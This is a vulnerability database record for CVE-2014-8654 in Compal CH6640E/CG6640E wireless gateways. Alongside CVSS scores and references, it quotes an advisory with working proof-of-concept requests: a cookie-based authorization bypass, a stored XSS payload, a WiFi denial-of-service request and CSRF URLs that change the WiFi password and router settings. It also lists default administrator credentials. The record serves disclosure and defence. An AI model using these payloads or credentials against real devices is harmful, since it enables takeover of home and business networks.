ID

VAR-201411-0177


CVE

CVE-2014-8654


TITLE

Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Cross-site request forgery vulnerability in hardware firmware

Trust: 0.8

sources: JVNDB: JVNDB-2014-005241

DESCRIPTION

Multiple cross-site request forgery (CSRF) vulnerabilities in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway hardware 1.0 with firmware CH6640-3.5.11.7-NOSH allow remote attackers to hijack the authentication of administrators for requests that (1) have unspecified impact on DDNS configuration via a request to basicDDNS.html, (2) change the wifi password via the psKey parameter to setWirelessSecurity.html, (3) add a static MAC address via the MacAddress parameter in an add_static action to setBasicDHCP1.html, or (4) enable or disable UPnP via the UPnP parameter in an apply action to setAdvancedOptions.html.

The CBN CH6640E and CG6640E are wireless gateway devices. They have multiple security vulnerabilities that allow an attacker to bypass authorization and access sensitive information, and to perform cross-site scripting, cross-site request forgery, and denial-of-service attacks.

Ch664oe Wireless Gateway is prone to a cross-site request forgery vulnerability. An attacker can exploit it through the 'UPnP' parameter in the apply action of the html page to enable or disable UPnP.

Product web page: http://www.icbn.com.tw

Affected version:
Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0

Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.

Default credentials:
admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more configuration information.

Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php

04.10.2014

---

Authorization Bypass Information Disclosure Vulnerability
#########################################################

http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml

Set cookie: userData to root or admin, reveals additional pages/info.

--
<html>
<body>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--

Denial of Service (DoS) for all WiFi connected clients (disconnect)
###################################################################

GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1

Stored Cross-Site Scripting (XSS) Vulnerability
###############################################

Cookie: userData
Value: hax0r"><script>alert(document.cookie);</script>

--
<html>
<body>
<script>
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
</body>
</html>
--

Cross-Site Request Forgery (CSRF) Vulnerability
###############################################

DDNS config:
------------
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1

Change wifi pass:
-----------------
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1

Add static mac address (static assigned dhcp client):
-----------------------------------------------------
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1

Enable/Disable UPnP:
--------------------
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)

Trust: 2.7

sources: NVD: CVE-2014-8654 // JVNDB: JVNDB-2014-005241 // CNVD: CNVD-2014-07893 // BID: 77760 // ZSL: ZSL-2014-5203 // VULHUB: VHN-76599 // PACKETSTORM: 128860

IOT TAXONOMY

category: ['Network device'] // sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2014-07893

AFFECTED PRODUCTS

vendor: compal broadband // model: cg6640e wireless gateway // scope: eq // version: 1.0

Trust: 1.8

vendor: compal broadband // model: - // scope: eq // version: ch6640-3.5.11.7-nosh

Trust: 1.6

vendor: compal broadband // model: ch664oe wireless gateway // scope: eq // version: 1.0

Trust: 1.0

vendor: compal broadband // model: ch6640e wireless gateway // scope: eq // version: 1.0

Trust: 0.8

vendor: compal broadband // model: networks // scope: eq // version: ch6640-3.5.11.7-nosh

Trust: 0.8

vendor: compal // model: broadband networks inc cg6640e wireless gateway // scope: eq // version: 1.0

Trust: 0.6

vendor: compal // model: broadband networks inc ch6640e wireless gateway // scope: eq // version: 1.0

Trust: 0.6

vendor: compal // model: broadband networks ch6640-3.5.11.7-nosh // scope: - // version: -

Trust: 0.3

vendor: compal // model: broadband networks ch664oe wireless gateway // scope: eq // version: 1.0

Trust: 0.3

vendor: compal // model: broadband networks cg6640e wireless gateway // scope: eq // version: 1.0

Trust: 0.3

vendor: compal broadband cbn // model: ch // scope: eq // version: model: ch6640 and ch6640e

Trust: 0.1

vendor: compal broadband cbn // model: ch // scope: eq // version: hardware version: 1.0

Trust: 0.1

vendor: compal broadband cbn // model: ch // scope: eq // version: firmware version: ch6640-3.5.11.7-nosh

Trust: 0.1

vendor: compal broadband cbn // model: ch // scope: eq // version: boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01

Trust: 0.1

vendor: compal broadband cbn // model: ch // scope: eq // version: docsis mode: docsis 3.0

Trust: 0.1

sources: ZSL: ZSL-2014-5203 // CNVD: CNVD-2014-07893 // BID: 77760 // JVNDB: JVNDB-2014-005241 // CNNVD: CNNVD-201411-189 // NVD: CVE-2014-8654

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2014-8654
value: MEDIUM

Trust: 1.0

NVD: CVE-2014-8654
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2014-07893
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201411-189
value: MEDIUM

Trust: 0.6

ZSL: ZSL-2014-5203
value: (3/5)

Trust: 0.1

VULHUB: VHN-76599
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2014-8654
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2014-07893
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-76599
severity: MEDIUM
baseScore: 6.8
vectorString: AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.6
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: ZSL: ZSL-2014-5203 // CNVD: CNVD-2014-07893 // VULHUB: VHN-76599 // JVNDB: JVNDB-2014-005241 // CNNVD: CNNVD-201411-189 // NVD: CVE-2014-8654

PROBLEMTYPE DATA

problemtype:CWE-352

Trust: 1.9

sources: VULHUB: VHN-76599 // JVNDB: JVNDB-2014-005241 // NVD: CVE-2014-8654

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201411-189

TYPE

cross-site request forgery

Trust: 0.6

sources: CNNVD: CNNVD-201411-189

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-005241

EXPLOIT AVAILABILITY

sources: ZSL: ZSL-2014-5203 // VULHUB: VHN-76599

PATCH

title: Top Page // url: http://www.icbn.com.tw/

Trust: 0.8

sources: JVNDB: JVNDB-2014-005241

EXTERNAL IDS

db: NVD // id: CVE-2014-8654

Trust: 3.5

db: EXPLOIT-DB // id: 35075

Trust: 2.9

db: BID // id: 70762

Trust: 2.7

db: ZSL // id: ZSL-2014-5203

Trust: 2.5

db: PACKETSTORM // id: 128860

Trust: 1.9

db: OSVDB // id: 113843

Trust: 1.8

db: OSVDB // id: 113842

Trust: 1.8

db: OSVDB // id: 113841

Trust: 1.8

db: OSVDB // id: 113840

Trust: 1.8

db: XF // id: 98329

Trust: 1.0

db: JVNDB // id: JVNDB-2014-005241

Trust: 0.8

db: CNNVD // id: CNNVD-201411-189

Trust: 0.7

db: CNVD // id: CNVD-2014-07893

Trust: 0.6

db: BID // id: 77760

Trust: 0.4

db: XF // id: 98328

Trust: 0.1

db: OSVDB // id: 113838

Trust: 0.1

db: OSVDB // id: 113836

Trust: 0.1

db: OSVDB // id: 113837

Trust: 0.1

db: OSVDB // id: 113839

Trust: 0.1

db: CXSECURITY // id: WLB-2014100162

Trust: 0.1

db: VULHUB // id: VHN-76599

Trust: 0.1

sources: ZSL: ZSL-2014-5203 // CNVD: CNVD-2014-07893 // VULHUB: VHN-76599 // BID: 77760 // JVNDB: JVNDB-2014-005241 // PACKETSTORM: 128860 // CNNVD: CNNVD-201411-189 // NVD: CVE-2014-8654

REFERENCES

url:http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php

Trust: 2.4

url:http://www.securityfocus.com/bid/70762

Trust: 2.1

url:http://www.exploit-db.com/exploits/35075

Trust: 2.0

url:http://osvdb.org/show/osvdb/113840

Trust: 1.8

url:http://osvdb.org/show/osvdb/113841

Trust: 1.8

url:http://osvdb.org/show/osvdb/113842

Trust: 1.8

url:http://osvdb.org/show/osvdb/113843

Trust: 1.8

url:http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html

Trust: 1.7

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/98329

Trust: 1.1

url:http://xforce.iss.net/xforce/xfdb/98329

Trust: 1.0

url:http://www.exploit-db.com/exploits/35075/

Trust: 0.9

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654

Trust: 0.9

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8654

Trust: 0.8

url:http://cxsecurity.com/issue/wlb-2014100162

Trust: 0.1

url:http://osvdb.org/show/osvdb/113836

Trust: 0.1

url:http://osvdb.org/show/osvdb/113837

Trust: 0.1

url:http://osvdb.org/show/osvdb/113838

Trust: 0.1

url:http://osvdb.org/show/osvdb/113839

Trust: 0.1

url:http://packetstormsecurity.com/files/128860

Trust: 0.1

url:http://xforce.iss.net/xforce/xfdb/98328

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656

Trust: 0.1

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657

Trust: 0.1

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653

Trust: 0.1

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655

Trust: 0.1

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656

Trust: 0.1

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657

Trust: 0.1

url:http://192.168.0.1/basiclanusers.html

Trust: 0.1

url:http://192.168.0.1/xml/docsisconfigfile.xml

Trust: 0.1

url:http://192.168.0.1/xml/cmgwbasicsetup.xml

Trust: 0.1

url:http://192.168.0.1/setwirelesssecurity.html?ssid=0&smode=7&sbmode=1&encalgm=3&pskey=new_password&rekeyint=0

Trust: 0.1

url:http://192.168.0.1:5000/rootdesc.xml

Trust: 0.1

url:http://192.168.0.1/basicddns.html

Trust: 0.1

url:http://192.168.0.1/setadvancedoptions.html?action=apply&instance=undefined&upnp=1

Trust: 0.1

url:http://192.168.0.1/xml/cmgwwirelesssecurity.xml

Trust: 0.1

url:http://192.168.0.1/wirelesschannelstatus.html

Trust: 0.1

url:http://192.168.0.1/setbasicdhcp1.html?action=add_static&macaddress=38%3a59%3af9%3ac3%3ae3%3aef&leasedip=8

Trust: 0.1

url:http://www.icbn.com.tw

Trust: 0.1

url:http://192.168.0.1/basicddns.html?ddnsservice=1&ddnsusername=a&ddnspassword=b&ddnshostname=c#

Trust: 0.1

url:http://192.168.0.1/setadvancedoptions.html?action=apply&instance=undefined&upnp=2

Trust: 0.1

sources: ZSL: ZSL-2014-5203 // CNVD: CNVD-2014-07893 // VULHUB: VHN-76599 // BID: 77760 // JVNDB: JVNDB-2014-005241 // PACKETSTORM: 128860 // CNNVD: CNNVD-201411-189 // NVD: CVE-2014-8654

CREDITS

Unknown

Trust: 0.3

sources: BID: 77760

SOURCES

db: ZSL // id: ZSL-2014-5203
db: CNVD // id: CNVD-2014-07893
db: VULHUB // id: VHN-76599
db: BID // id: 77760
db: JVNDB // id: JVNDB-2014-005241
db: PACKETSTORM // id: 128860
db: CNNVD // id: CNNVD-201411-189
db: NVD // id: CVE-2014-8654

LAST UPDATE DATE

2025-04-13T23:14:41.528000+00:00


SOURCES UPDATE DATE

db: ZSL // id: ZSL-2014-5203 // date: 2014-11-07T00:00:00
db: CNVD // id: CNVD-2014-07893 // date: 2014-11-10T00:00:00
db: VULHUB // id: VHN-76599 // date: 2017-09-08T00:00:00
db: BID // id: 77760 // date: 2014-11-06T00:00:00
db: JVNDB // id: JVNDB-2014-005241 // date: 2014-11-07T00:00:00
db: CNNVD // id: CNNVD-201411-189 // date: 2014-11-14T00:00:00
db: NVD // id: CVE-2014-8654 // date: 2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db: ZSL // id: ZSL-2014-5203 // date: 2014-10-25T00:00:00
db: CNVD // id: CNVD-2014-07893 // date: 2014-11-04T00:00:00
db: VULHUB // id: VHN-76599 // date: 2014-11-06T00:00:00
db: BID // id: 77760 // date: 2014-11-06T00:00:00
db: JVNDB // id: JVNDB-2014-005241 // date: 2014-11-07T00:00:00
db: PACKETSTORM // id: 128860 // date: 2014-10-28T00:59:24
db: CNNVD // id: CNNVD-201411-189 // date: 2014-11-14T00:00:00
db: NVD // id: CVE-2014-8654 // date: 2014-11-06T15:55:10.803